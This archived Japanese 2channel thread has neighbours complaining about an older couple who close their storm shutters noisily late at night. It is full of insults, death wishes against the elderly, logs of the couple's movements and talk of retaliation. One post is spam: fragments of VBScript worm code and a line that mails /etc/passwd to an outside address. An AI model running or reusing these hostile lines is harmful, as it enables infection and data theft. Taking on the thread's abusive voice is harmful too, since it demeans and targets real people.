2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

60代へ、なぜ今頃雨戸を閉めるの?

1 :名無しさん@お腹いっぱい。:2005/07/26(火) 22:44:46 ID:+I7woqhS
もう、こんな時間ですよ。
たのご家庭で閉めているところあります?

2 :名無しさん@お腹いっぱい。:2005/07/27(水) 01:41:12 ID:9M9bi3Yl
台風七号。閉める。
七号去れば開ける。

3 :名無しさん@お腹いっぱい。:2005/07/31(日) 14:28:13 ID:k5hJpBB1
1戸建ての家の雨戸って雨の日はともかく晴れの日は
全部朝から開けてなければいけないものですか?閉める時間
も決まってるんですか?

4 :名無しさん@お腹いっぱい。:2005/08/05(金) 11:33:29 ID:VDP2jgVG
要するに閉め方の問題と、時間
まぁまともなご近所のやりかたを観察してみれば?
常識とは?を考えれば良い

5 :名無しさん@お腹いっぱい。:2005/08/06(土) 22:31:38 ID:l1Re2Bol
5様

6 :名無しさん@お腹いっぱい。:2005/08/06(土) 22:59:06 ID:FB4U7VMc
わからない

7 :名無しさん@お腹いっぱい。:2005/08/08(月) 22:25:03 ID:joehbZQt
今、また隣のプレ団塊がおもいっきり、今日も「何か嫌な事でもあったように」
今頃雨戸をしめています
ここ当たり周辺どこの家庭も閉めていないのに
0時以降でも我がままに閉めることあり
団塊って、なんで馬鹿なのか?

8 :名無しさん@お腹いっぱい。:2005/08/08(月) 22:48:35 ID:tEZrsFZA
また、閉めているな
がらがらがっしゃ〜〜ん
団塊は馬鹿だなw

9 :名無しさん@お腹いっぱい。:2005/08/12(金) 05:27:31 ID:jV9d4SsU
どろぼうに入られないために閉めてるんだろ。
どろぼうがこわくない奴は開けとけ。
あとで後悔することになるかもな。

10 :名無しさん@お腹いっぱい。:2005/08/14(日) 23:30:12 ID:KfxSNghF
閉める時間じゃぼけ
さぁいま閉めているぞw

11 :名無しさん@お腹いっぱい。:2005/08/15(月) 00:18:12 ID:uEQDw0q4
0時まわっとるやないけ
常識の無い団塊
となりがうるさかろうが、関係ないなw
馬鹿か


12 :名無しさん@お腹いっぱい。:2005/08/15(月) 18:38:09 ID:ohHbHz8O
今日も見た
雨戸を閉めるのが遅い糞団塊
先程帰ってきた
で、今晩は何時だろうね

暑いから雨戸を閉めるのが遅い?
でも、いま涼しいのに窓を開けないで
何をしているの?

で、もうお祖父さんだから2階に登るのがしんどいんだね

で、何故涼しい1階で寝ないの?
わざわざ2階でw

馬鹿?夏は2階は暑いよ

で、モルタルの壁で、1階の床は電気温風機?wで床を乾かして?
ファンが逆だろう?w
何も知らない団塊w

13 :名無しさん@お腹いっぱい。:2005/08/18(木) 23:34:52 ID:b2Fw4XTg
今晩はまだ開いてます
明日も再就職のお仕事なのにねw
職場でねているのね
アマチュア無線して遊んでいらっしゃいますw

14 :名無しさん@お腹いっぱい。:2005/08/18(木) 23:38:00 ID:OpRcWrcE
60歳って6時間しか寝なくても大丈夫なのか?

15 :名無しさん@お腹いっぱい。:2005/08/20(土) 07:26:38 ID:6n0c7hRF
>14
一般的に夜は眠たくならないんだよ、歳寄りは。
晩酌程度の酒で寝ても、1時間も経てば目が覚める。
俺は52歳だが4〜5時間だよ。
2時になっても眠れない場合は睡眠導入剤を飲む。(週2回程度)

台風でもないのにいちいち雨戸を閉めるってのが分からないな。
1週間海外旅行で留守になる場合でも雨戸は閉めたことがない。
「我が家は昼も夜も不在してま〜す」って泥棒に教えてあげてる様なものだろう。
まぁ我が家は雨戸ではなく、静かな電動シャッターですけどね。


16 :名無しさん@お腹いっぱい。:2005/08/20(土) 09:04:13 ID:mLAEd9U4
なんかに書いてあったけど、年取ると自己顕示したくなるらしい
いわゆる幼児ガエリ。還暦だし、、。戦争知らない子供の走りだし。
時代の背景もあるんでしょうけど、、でも中には立派な人もいるけど、。
雨戸の閉め方って多分本人気にしていないんじゃないでしょうか?
近所は多分、皆迷惑がっていると思いますよ〜ウチの回りにもいっぱい
いるよ。気になるとたまんないんだけど、逆ギレれするのがコノ年代
周りにどんな目で見られているか知らない哀れな人と思えば腹も立たない。


17 :名無しさん@お腹いっぱい。:2005/08/20(土) 11:53:41 ID:+lkALOLN
昨晩は深夜1時45分に閉めよった
バカ?この近辺で遅く閉める家庭
どこもない

18 :名無しさん@お腹いっぱい。:2005/08/20(土) 22:02:43 ID:bBbt66uV
深夜にしまる時に、「じぃっと」眺めていたらどうなるだろうか?w
何も言わずに
隣の家まで二階の距離3,4m

19 :名無しさん@お腹いっぱい。:2005/08/22(月) 00:56:50 ID:esZh0rXA
今日は珍しく、23時までに閉まったが、一日雨だった
しかし、明日からしごとなのに、
夜中になにやらゴトゴトと音がする
このお隣深夜になるとなにかしている
睡眠時間5時間以下で、仕事へ

職場で寝ているのだろうか?
居眠りして給与がもらえるとはw

20 :名無しさん@お腹いっぱい。:2005/08/25(木) 23:43:29 ID:RGD8oYy0
呆れるわい、アフォでっか?

21 :名無しさん@お腹いっぱい。:2005/08/26(金) 16:13:28 ID:mLdlci64
一度、隣の60歳の家庭に「雨戸煩い、あふぉか」って言ったら、溝が入るだろうな 笑

22 :名無しさん@お腹いっぱい。:2005/08/26(金) 16:37:44 ID:IRX8am7F
近所のどケチ婆さんは15年前家を新築してから、ずーと雨戸を
閉めている。開けたところを私は見たこと無い。(たまーに風通しに開けるらしい)
畳とフスマが日に焼けて古くなるのが嫌なんだって。
かび臭いほうが、健康にも悪いと思いますが・・・

23 :名無しさん@お腹いっぱい。:2005/08/26(金) 22:56:01 ID:kvxnMRTk
だから閉める時間だよw

24 :名無しさん@お腹いっぱい。:2005/08/27(土) 20:07:46 ID:Zj1Xvf5d
>>22
昔の工法で建てられた日本建築なら家自身が呼吸しているので閉めていても問題ない場合がある
壁と内材によるな
日照時間の関係もあるな
西日はきついな

25 :名無しさん@お腹いっぱい。:2005/08/27(土) 23:47:14 ID:c5Nag4WJ
今晩も、今
「がんがらがちゃ〜〜〜〜ん、がらがら」
閉め方が荒いw

26 :名無しさん@お腹いっぱい。:2005/09/18(日) 00:12:17 ID:dmWGx19Y
またや、常識ないのかぼけ

27 :1:2005/09/20(火) 15:40:44 ID:B93p9PHW
人生万事塞翁が馬と思えばいいのか?馬鹿プレ団塊へ
意味は世の幸・不幸に気を取られず、自己の生きる道に一途に進めということ。

世間様にご迷惑をかけてもなにひとつ気づかないのは、楽しいだろうな
敬老精神でお隣のあなた様を見守っていたが、あまりにも度が過ぎる
団塊の方々は過去に親から離れてお住まいを建てられ好き勝手している
内に我が身は誰にもとがめられないということをお感じになられていないのでは?
若者流に申せば、ププププププププップッップですよ
プッ


28 :名無しさん@お腹いっぱい。:2005/10/02(日) 18:22:51 ID:kIlm+FfQ
馬鹿だな、糞爺婆

29 :名無しさん@お腹いっぱい。:2005/11/19(土) 16:36:24 ID:ViBJpLsU
隣近所のことを考えて締めたらいいのにな
身勝手過ぎるな
この年代のものは

30 :名無しさん@お腹いっぱい。:2005/11/19(土) 17:58:05 ID:4ftz9JLB
なんや このスレ????精神病の方達???隣家の動向監視して、暇なんですね。ノイローゼなんでしょか?

31 :名無しさん@お腹いっぱい。:2005/11/19(土) 18:02:32 ID:7k0A79Nq
そんなわざわざ監視なんかするかよw
そんなことをしなくとも、酷い締め方、常識はずれの時間に締めるから
聞こえるんじゃよw

32 :名無しさん@お腹いっぱい。:2005/11/20(日) 18:39:00 ID:HkQw1lTH
故意な嫌がらせだね。あんたもやり返せば!?

33 :名無しさん@お腹いっぱい。:2005/11/20(日) 21:18:32 ID:dzl08OsL
そんなに気になる事かねー!
ふーん

34 :名無しさん@お腹いっぱい。:2005/11/20(日) 22:28:03 ID:ODDtBw/Q
今日は今閉まったw 凄まじい音 阿呆か?

35 :名無しさん@お腹いっぱい。:2005/11/20(日) 23:11:14 ID:q/S9IY/Z
アホの家のポストに「雨戸は静かに、10時迄に閉めて下さい」
と紙にかいて投函してあげましょう。
怒りマークも書き加えたほうが良いかもw

36 :名無しさん@お腹いっぱい。:2005/11/20(日) 23:16:06 ID:VNcpaFdg
家族が、それだけは言わないで欲しいといつもなだめられているw

ご近所だから


これ以上切れたら投函します。直ぐに隣と分かりそうですね。w

37 :名無しさん@お腹いっぱい。:2005/11/21(月) 18:02:13 ID:YdUpYMRs
今、帰ってきたんやな隣、1階は今締めている。ところで、建築違反して、境界ぎりぎりに建てた家の2階の雨戸はこんなに寒くなっても夏と同じで、22時以降に締めている。
そんなにあつがりかぁ?そのくせ雨戸を締めずに温風ヒーター入れているんだろう?

温度管理知識無しだなw
アマチュア無線、10分でできるホームページ本だけは読んでいるのになぁ。w

窓ガラスのまましておけば、室内の暖かい空気が逃げることくらい知らないのか?

馬鹿な団塊w

38 :名無しさん@お腹いっぱい。:2005/11/21(月) 19:17:41 ID:zmI8/mVZ
閉めるの早いが、開けるのもはえぇーぞ!
17時に閉めて、6時に開ける 文句あるか!



39 :名無しさん@お腹いっぱい。:2005/11/21(月) 19:23:23 ID:gQf3rnxE
この隣の糞団塊の馬鹿30代の息子が未だに改造マフラーを取り付けている
1998年から改造マフラーで煩かった。結婚して出て行ったが、近くに住んでいるから
時々やってくる。30代の大手企業M&A買収企業の高卒係長がトヨタのエスティマ、ダイハツの
軽、エスティマ売って、ポルテに乗り換え未だに煩いマフラー?
未だに子供も作らず!
そうした親は、子供の上層教育の為の実家の犬を、母親は犬の臨終間際に煩いから
足で蹴って!死ねよ団塊

40 :名無しさん@お腹いっぱい。:2005/11/21(月) 19:24:45 ID:gQf3rnxE
>>38
23時30分に締めて、6時45分にお前は開けるか?w

41 :名無しさん@お腹いっぱい。:2005/11/21(月) 20:20:53 ID:kIDsGSWr
今晩はお隣より遅く締めてみるw

42 :名無しさん@お腹いっぱい。:2005/11/21(月) 20:23:21 ID:JD8wxmX+
>>40
耳栓して今はテスト、高周波だけは聞こえないなぁw

そうして、真空防音ガラスを検討中

お隣の責任で金がかかるw

43 :名無しさん@お腹いっぱい。:2005/11/21(月) 20:24:38 ID:euC0Bj7w
プレ団塊って、がめついな。しかも、身勝手w

44 :名無しさん@お腹いっぱい。:2005/11/21(月) 20:43:23 ID:mha+35hE
ネットに書き込む前に普通にお隣に言えなかったの?
雨戸、もう少し早く閉めて下さいって。
こんなに不満を溜め込んで、なおかつネットで愚痴ってたら
もう絶対に普通には話せないでしょ。
こじれるだけのような気がするな。

45 :名無しさん@お腹いっぱい。:2005/12/02(金) 18:28:37 ID:cOSYxwRW
今晩は実験。お隣が閉めてから、こちらが遅く閉めてどんな反応をするかです。w
なにか、嫌がらせがsるのか実験

46 :名無しさん@お腹いっぱい。:2005/12/04(日) 18:21:43 ID:x62cKDeC
http://www.goebay.com/link.php?ref=b91915

47 :名無しさん@お腹いっぱい。:2005/12/04(日) 23:06:32 ID:4rZmUNeU
>>44
無駄な家だからしない
今閉まったw
馬鹿

報復してあげますからw

48 :名無しさん@お腹いっぱい。:2005/12/05(月) 20:28:31 ID:+KstpQUn
お隣の亭主60歳で再就職
婆は50代
で、もうすでにご帰宅
でも、外は雪がふりそうなくらい寒い
でも、雨戸は閉めずにね

冬も夏も同じ時間に閉めるのだ

温度管理知らない馬鹿(プレ)団塊夫婦

49 :名無しさん@お腹いっぱい。:2005/12/06(火) 18:24:56 ID:XgeCp09X
先程、帰って来た隣のプレ団塊
一階の雨戸一つだけ、カタンと柔らかく閉めた
さて、二階はどんな風に閉めるのかだ 笑い


嫌がらせとは理解しているのだが


寒いのにまだ閉めない馬鹿な60代男と50代後半の婆

床は湿気て年中24時間ファン廻して

子供の改造マフラーがうるさい
子供が出て行ったあとの飼い犬はうるさい(足で蹴った婆、動物虐待)

50 :名無しさん@お腹いっぱい。:2005/12/06(火) 21:16:59 ID:Ve5IHsF4
今日は寒いからこちらが閉めた
アフォらしい
団塊の相手は 早く死んでくれるといいけど
改造マフラーの35歳の子が戻ってくるんだよね

また、うるさいのが

51 :名無しさん@お腹いっぱい。:2005/12/07(水) 23:36:57 ID:npkiRZTU
みな田舎に住んでいるのか?都会の一戸建ては昼間でも雨戸を閉めている
ところが少なくないぞ。なぜって?治安が悪いからさ。泥棒や強盗を怖が
っているんだ。


52 :名無しさん@お腹いっぱい。:2005/12/19(月) 22:28:10 ID:TMu3rZ43
今から閉める団塊。外は雪

53 :名無しさん@お腹いっぱい。:2005/12/21(水) 21:31:39 ID:OhBmzAwW
この糞寒いのに夏同じ時間の22時おしめになります。
そこで、当方も深夜22時以降に閉めて報復?(そんなばかな)お教えしてあげます
このお隣は0時以降に風呂に入って、朝6時45分にまた「がらがらがっしゃ〜〜〜ん」w
と雨戸を開けて、再就職先へw

54 :名無しさん@お腹いっぱい。:2005/12/21(水) 23:06:31 ID:x9qHRMeg
きょうはこちらも深夜に閉めてあげますw

55 :名無しさん@お腹いっぱい。:2005/12/21(水) 23:30:11 ID:DP40Lucn
死ね団塊

56 :名無しさん@お腹いっぱい。:2005/12/22(木) 18:28:11 ID:NM8P7yFo
こんな猛吹雪でも「がらがらがっしゃ〜〜ん」と早朝嫌がらせの様に開けて、ご苦労w
温度管理知らない、デブ爺

57 :名無しさん@お腹いっぱい。:2005/12/26(月) 18:31:22 ID:zrZuH06i
http://house.bbs.thebbs.jp/1126688382/25p
あの世↑

58 :名無しさん@お腹いっぱい。:2005/12/28(水) 17:09:31 ID:V9EGU36h
お隣さんへ
こちらから、大きな字で垂れ幕に書いておきます
「雨戸の閉め方うるさい、もっと速くしまりませんか?」
「そんな、いやがらせみたいに、がらがらがっしゃ〜〜〜ん、ピシャリ」
と閉めないでください。
と、やろうかなと思う今日この頃 笑

報道機関にも取材してもらおうかと思うw

59 :名無しさん@お腹いっぱい。:2005/12/28(水) 17:18:25 ID:/bwBzWC+
こちらは、もう雨戸閉めた。寒いし昼の暖かい日差しをじゅうぶんいれた。
お隣は、もう帰っているのにまだ閉めていない

60 :名無しさん@お腹いっぱい。:2005/12/28(水) 17:23:11 ID:g1nsi/H5
朝日が昇る頃に開けて、カラスが巣に帰る頃に閉める。
これが日本の本来の雨戸の使用法。
夜中近くに閉める奴は日本人じゃないんじゃないか?

61 :名無しさん@お腹いっぱい。:2005/12/28(水) 17:26:39 ID:T4s1Ad5x
今、一階が閉まりました
聞こえたかなぁw

62 :名無しさん@お腹いっぱい。:2005/12/28(水) 17:42:14 ID:iEF0TmAH
>>60
同意

63 :名無しさん@お腹いっぱい。:2005/12/28(水) 18:39:00 ID:Q1THjukl
まだ、閉めて居られない
ご就寝時にお締めになる実態

64 :名無しさん@お腹いっぱい。:2005/12/28(水) 20:00:32 ID:OuQe1LyG
がらがらがっしゃ〜〜〜ん、ピシャリ
↑                  ↑
 雨戸の音           サッシ窓の音

もう一つ、鍵を閉める音と、障子を閉める音


今晩は22時30分


これは恒例?高齢w

65 :名無しさん@お腹いっぱい。:2006/01/01(日) 01:53:30 ID:ZzsVuT5t
発毛から、今帰ってきよった
車停めて、いつものようにバケツカンカラかんと鳴らして、ないやら移動させて
昼も夜も変わらない生活習慣

今、夜ですが。

さて、これから雨戸ががんがらガッシャ〜ンと閉まる

66 :名無しさん@お腹いっぱい。:2006/01/04(水) 21:35:58 ID:XMAwQa+k
大きな生地にペンキで、「今雨戸を開けるお隣の○田さんへ」
夜中に閉める音がうるさいのです」
静かに閉めるか、夕方お帰り時に閉まりませんか?」

と赤で書くことを思案中

67 :名無しさん@お腹いっぱい。:2006/01/04(水) 22:08:42 ID:rDxuDLbE
>>66
う〜ん、難しいよね。
スレを読んできたけど、お隣さんは常識や近隣への配慮など
全く考慮する観念すらなさそうだよね。
うっかり注意でもしたら奈良の騒音おばさんみたいに
逆切れされるんじゃないかな。
と言って放っとくわけにも行かないだろうけどネ。

68 :名無しさん@お腹いっぱい。:2006/01/06(金) 18:01:22 ID:UwwyiPRc
生活習慣がおかしいんだな
普通は、昼の日差しを入れる
暖かいあいだに閉める
これ、普通

69 :名無しさん@お腹いっぱい。:2006/01/06(金) 20:54:26 ID:HZZ0vzku
>>67
まぁ、やめておきます
それより、防音工事をする予定。工事の施工で何かとお隣が聞きに来るはず。
また、時々来るお隣のご子息の改造マフラー(トヨタのポルテの新車に!)もうるさいので!低周波防音工事
を予定!安眠を望んでいます。
それで、お隣もお気づきなれば良い方向になると信じております。

どうなるやら。

70 :69:2006/01/30(月) 21:25:55 ID:uCdC6NqB
今日は、今閉まりました 笑
雨と黄砂で汚れた車を水洗いしたところ、なにやら大きな音がw
外で聴いてもうるさかったです

これは、凄い

思いっきり閉めているw

がらがらガッシャ〜ン、ぴしゃり、カチw
1分間で3方向の雨戸が全部閉まる

面白いw

71 :名無しさん@お腹いっぱい。:2006/01/31(火) 17:58:04 ID:2hRhqQHj
一階東側二窓、台所は今閉まった
いつになく勢いが良い
がらがらがっしゃ〜〜ん

これは、かかぁ殿下の婆の閉める音か
そうかぁ、婆の仕業か

72 :名無しさん@お腹いっぱい。:2006/02/02(木) 23:02:40 ID:JxW0z3In
今日は、今先程閉めやがった、死ね

73 :名無しさん@お腹いっぱい。:2006/02/03(金) 18:52:46 ID:CFcD0YAP
一階は今、閉まった

74 :名無しさん@お腹いっぱい。:2006/02/06(月) 18:23:08 ID:R+jleFmx
隣の糞婆
先程、帰ってきた
今日は雪が降っています
一階はもう閉まった
二階はまだ
二階で寝ているのです

かかぁ殿下の家と、ご近所からの情報

これは、ややこしいw

75 :名無しさん@お腹いっぱい。:2006/02/07(火) 17:16:51 ID:wzlmaPop
やっと分かりました。お隣馬鹿アフォ断定

76 :名無しさん@お腹いっぱい。:2006/02/07(火) 18:39:10 ID:XalLH6AC
今日は、もう帰っているはw
今、一階が豪快に閉まったw
凄いw

やはりペンギン村のようだw

77 :名無しさん@お腹いっぱい。:2006/02/07(火) 21:04:25 ID:X/TA2Nc0
今日は今、2階の北側が閉まった
5秒で一窓閉まるw
2階全部で、30秒

沢山の雨戸ですねw

78 :名無しさん@お腹いっぱい。:2006/02/09(木) 18:04:43 ID:Y7mj08Vz
先程、帰ってきよった

79 :名無しさん@お腹いっぱい。:2006/02/09(木) 18:45:19 ID:FLJHy39Q
今、一階が閉まりました
豪快な音

80 :名無しさん@お腹いっぱい。:2006/02/09(木) 19:04:00 ID:uhYk7Wgl
アフォかよ、お隣さん

81 :名無しさん@お腹いっぱい。:2006/02/17(金) 18:37:36 ID:gbmSLQKW
お隣、アマチュア無線やる、理論しらない馬鹿断定w
ええとしこいて、プ

82 :名無しさん@お腹いっぱい。:2006/02/19(日) 23:54:33 ID:dkQ3Orvc
非常識な60代

83 :名無しさん@お腹いっぱい。:2006/02/20(月) 18:01:35 ID:G690w7Lt
やっと、確認した。非常識な時間帯、閉め方をするのは、今帰ってきた団塊の妻の仕業だと
この叔母は、性格がいらち、がさつなのが、家の親に聴いてわかりました。
変人。この婆の亭主は婆のかかあ天下と、有名なのをやっと教えてもらいました。
こりゃ、大変だ。

キモイ

84 :名無しさん@お腹いっぱい。:2006/02/20(月) 18:27:33 ID:5krd4BQs
よし、まだ閉めないな
今日は深夜に報復してやるぞw

85 :名無しさん@お腹いっぱい。:2006/02/20(月) 21:44:05 ID:Vdl2AGEb
今宵は折角報復をしようと思ったのに、21時30分に閉まったので、こちらも閉めた。
残念

86 :名無しさん@お腹いっぱい。:2006/02/22(水) 22:54:07 ID:RNwHk1nQ
今日は確認した、婆だw

87 :名無しさん@お腹いっぱい。:2006/02/25(土) 23:22:56 ID:5WPfnpEO
段々と遅くなってきた
今日は23時5分締まりw

88 :名無しさん@お腹いっぱい。:2006/02/27(月) 18:25:15 ID:oJ7yD4dX
日が陰ったので、家は雨戸を閉めた
お隣は、もう婆がパートから帰っているのに、まだ全開w

89 :名無しさん@お腹いっぱい。:2006/02/27(月) 20:58:55 ID:9L8oL33V
水戸黄門が終わったからかな?今一斉に閉まっている

90 :名無しさん@お腹いっぱい。:2006/03/02(木) 18:09:48 ID:Deuiw9+F
今、婆が帰ってきた。さて、亭主はもうすぐ帰ってくるな。
で、アマチュア無線して、遊んで、無免許の婆にも無線をさせて
違法行為をする隣

91 :名無しさん@お腹いっぱい。:2006/03/03(金) 18:19:34 ID:qfl4s72K
昨晩は22時55分に閉まった
今晩は終末だが、一度閉めるところをカメラにおさめます
フラッシュたくぞ w

あぁ〜〜〜うるさい

92 :名無しさん@お腹いっぱい。:2006/03/03(金) 18:23:35 ID:ib6NpBRn
18時21分現在、隣の団塊は両夫婦ともに帰宅しています
でも、今日は雪が降って寒いのにまた深夜に雨戸を豪快な音をたてて閉める予定
いやがらせも、キモイ

93 :名無しさん@お腹いっぱい。:2006/03/03(金) 18:46:27 ID:Y4vfKoDU
さて、これだけ嫌がらせされたから、やり返す

94 :名無しさん@お腹いっぱい。:2006/03/06(月) 18:18:40 ID:YcRkzquB
雨戸基地外閉め方の61歳男と女の年齢はしらん
婆顔になったのはわかる

今帰ってきた
昨年に再就職で嫁のパート先近くに写った、DQN子の親

家の建て方が建築法違反

95 :1:2006/03/06(月) 20:21:51 ID:xYLFJOg8
本日は夕刻6時頃に閉まりました 笑
2階でにらんだりして遊んでいる家になぜかお隣は理解した模様w
さて、今後どうなる事やらw

96 :名無しさん@お腹いっぱい。:2006/03/06(月) 20:26:43 ID:Fdmw/Rjf
新しく作りました『うんこちゃんねる』の紹介です。
笑いあり、泣きあり、涙ありの掲示板です。

http://jbbs.livedoor.jp/news/3058/

97 :名無しさん@お腹いっぱい。:2006/03/07(火) 21:02:08 ID:P9fDYyKD
またやな、一生懸命二階でアマチュア無線をして(電話級で違法高出力で)
未だに閉めずになw

98 :名無しさん@お腹いっぱい。:2006/03/07(火) 21:13:08 ID:5zFJjjpK
なんだか気持ち悪いスレですね
引越しおばさんですか?

99 :名無しさん@お腹いっぱい。:2006/03/08(水) 20:45:30 ID:IewH1Egf
隣は騒音おばさん

100 :名無しさん@お腹いっぱい。:2006/03/09(木) 13:19:15 ID:svOUKRG0
ガスバーナーで
ガラス戸に穴を
あける泥棒よけ

101 :名無しさん@お腹いっぱい。:2006/03/17(金) 18:50:54 ID:rVHHlyM/
隣のカムリ今帰ってきた
雨戸はそのまま

102 :名無しさん@お腹いっぱい。:2006/03/19(日) 23:07:47 ID:jE9sTEbo
嫌がらせが少しましになった

103 :名無しさん@お腹いっぱい。:2006/03/20(月) 19:52:44 ID:Xw/yHjCt
今晩は何時に閉まるかな?
明日休みだし遅いかな?
お隣は休みだと昼まで寝ているな
こちらが休日に早く開けると嫌がらせになるのかな?w
やっと気がついた

104 :名無しさん@お腹いっぱい。:2006/03/23(木) 17:56:31 ID:7eQD76bF
隣の62歳もう帰っているぞw
早く帰っても雨戸は深夜1時
テレビは大音響

基地外?お隣は
で、朝は6時45分に雨戸を大音響で開ける

105 :名無しさん@お腹いっぱい。:2006/03/23(木) 17:57:39 ID:fQPnFfPt
爺は仕事中、お昼寝をしているもんね

106 :名無しさん@お腹いっぱい。:2006/03/23(木) 21:23:10 ID:mpp5i47w
まだ、お隣は閉まりません
「がんがらがっしゃん〜ん」深夜でもご近所のことなんか
関係無い!

基地外のお隣をどうしたらいいのでしょうね

107 :名無しさん@お腹いっぱい。:2006/03/27(月) 22:17:14 ID:q6Yg4TN8
ttp://ani.atz.jp/ip/ip2.cgi

108 :1:2006/03/31(金) 00:09:31 ID:3aV/7sPc
隣の嫌がらせは少しましになってきましたw
飽きたのかも

109 :1:2006/04/10(月) 18:54:15 ID:TF75WbTd
今宵は、18時5分に夫婦揃って帰ってきた
雨戸は、まだ閉まらず
日中大雨でも全開


閉めるときに、「ぎぎぎぎぎぎぎ」
黄砂で砂がレールに溜まっているw

がんがらがっしゃ〜ん 基地外みたいに深夜に寝るときに閉めるな、ぼけ氏ね

110 :1:2006/04/12(水) 22:33:15 ID:3M1jVsiL
今、ガンガラガッシャーン やってます
お隣!うるせぇ

111 :1:2006/04/12(水) 22:34:29 ID:3M1jVsiL
一つ窓、5秒で閉まったw

112 :名無しさん@お腹いっぱい。:2006/04/12(水) 22:36:08 ID:3M1jVsiL
氏ね、肺の無い基地外

113 :名無しさん@お腹いっぱい。:2006/04/14(金) 09:10:12 ID:m/+ocvLR
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))


114 :1:2006/04/14(金) 18:37:27 ID:bOWtNuHd
>>113
何やってんの?馬鹿?全く感知しないが?w
で、今日はお隣は18時5分に夫婦ともに帰ってきた
さて、何時にしまるかな?w

115 :1:2006/04/16(日) 23:09:57 ID:uufFz/d+
今閉まりました
また、はじまったぞ 
遅閉まり


がんがらがっしゃ〜〜〜ん

116 :1:2006/04/17(月) 21:26:02 ID:/F8+j7qB
今、一階ががんがらがっしゃ〜〜〜んと閉めておるわいw

117 :名無しさん@お腹いっぱい。:2006/04/21(金) 18:51:46 ID:eedknG7k
騒音おばさんのおかげで、お隣の騒音問題も裁判だなw

118 :1:2006/04/28(金) 18:09:25 ID:7Du+G1NY
本日は、確認した
先程、17時30分、婆がパートから帰宅

さて、何時に閉まるかな?

119 :名無しさん@お腹いっぱい。:2006/04/29(土) 00:39:10 ID:364jJNjo
なかなか興味深くて全部読ませてもらった。
その老夫婦は、おやすみなさいをいってるつもりなのかも。
そんなに窓が接近しているなら、ガラカラと閉める時に負けじと「おやすみなさい」と声を張り上げれば、自分のうるささに気付いておとなしくなるかも。

ちなみにうちの実家の親は50代だけど、昼間に母がいる居間と寝室は雨戸しめっぱなし。
で、父が仕事から帰宅すると、父が雨戸を閉めて回る。
母はご近所の人に行動を見られるのが恐くて、窓には近付けないそうだ。
でも、やっぱり夜の11時に閉めるのは異常だと思ったよ。
私は年一回くらいしか顔出さないから、面倒を見てるわけでもないので注意できなかったけど。
違法建築と騒音で大変ですな。

120 :名無しさん@お腹いっぱい。:2006/04/30(日) 23:51:38 ID:bV14W015
先人の常識には良い物があるということですな

121 :名無しさん@お腹いっぱい。:2006/05/03(水) 23:07:21 ID:Mh7wrF3D
今日も家中の雨戸を今閉めておるw
この近辺では隣だけだな

他のどの家庭も今頃閉めていないのになw
気づかない様だ

122 :名無しさん@お腹いっぱい。:2006/05/04(木) 04:16:47 ID:QED3xBso
隣の雨戸の開け閉めが昔からウルサイ!
誰かが見てる訳でもないのに、異常な速さでヒステリックに閉めやがる。
かといって顔合わすと普通なんだな。
まぁ、神経質で胃を半分取ってるくらいだから、キチガイなんだろう。
やんわり注意してもダメだったからな。

このスレ見て結構、雨戸の音が気になる人達が多くてビックリした。

引っ越すとしたら、周りの家がに雨戸がないのが条件だよな?

ガラガラガッシャーーンって閉める神経がわからんよ。
隣のババア死んでくれ!


123 :1:2006/05/04(木) 20:21:29 ID:vynrjRJU
本日は、こちらも先程20時に閉めてみた
明日も休日だから、遅いだろうな w

124 :名無しさん@お腹いっぱい。:2006/05/05(金) 01:36:19 ID:/Br46UBj
>>1
雨戸の稼動部分にアロンアルファ着けちゃうってのはどう?

125 :名無しさん@お腹いっぱい。:2006/05/05(金) 01:37:04 ID:/Br46UBj
可動...ね

126 :1:2006/05/05(金) 23:40:17 ID:AlQgefW6
>>124
笑 それは・・・

で、昨日、お隣20時38分頃に閉まりました
今宵は、20時にw

で、こちらは20時半に

あれれ???

127 :名無しさん@お腹いっぱい。:2006/05/07(日) 13:55:29 ID:92A2M2wG
バカどんも分んねかよ!雨戸閉めなきゃNHKとかしゃっくり鳥が来ちゃうからじゃ

128 :1:2006/05/08(月) 22:18:57 ID:43D42P1L
さぁ〜て。今日もまだ閉まっていない
と、思ったら今閉めているw

凄い音wwww
 あぁ〜〜〜〜〜あぁ

うあぁ〜〜〜うるさ〜〜〜〜

129 :簡潔頭巾:2006/05/08(月) 22:22:26 ID:INAUtzna
団地に雨戸はない

130 :1:2006/05/13(土) 19:10:20 ID:rWZLmsew
嫌がらせだったのか?最近早く閉まるようになりましたw

不思議

今日は、もう閉まっている

131 :名無しさん@お腹いっぱい。:2006/05/15(月) 23:49:24 ID:uQZlOxlI
今頃、閉めるなぼけ 死ね

132 :1:2006/05/19(金) 16:20:52 ID:j2zbiUIM
昨晩も23時に閉めやがった

133 :1:2006/05/19(金) 18:21:00 ID:1yqLNsxI
このうるさい家の向こう隣は今閉まった
普通のご家庭は夕方に閉まるのだ

134 :名無しさん@お腹いっぱい。:2006/05/26(金) 23:34:45 ID:Fs7GmtR+
閉まった時刻 22:49

135 :名無しさん@お腹いっぱい。:2006/05/27(土) 08:48:33 ID:P59uIPwp
隣、まだ寝てやがるw
これは昼だな

136 :---:2006/05/27(土) 11:04:09 ID:zw3f+yDs
音がするっていうのは生きている証拠。
しなくなったら気を付けたほうがいい。
最近はまっているブログがあるので、そんな風におもえました。
清掃レスキュー で検索 トップの会社のデス・・・

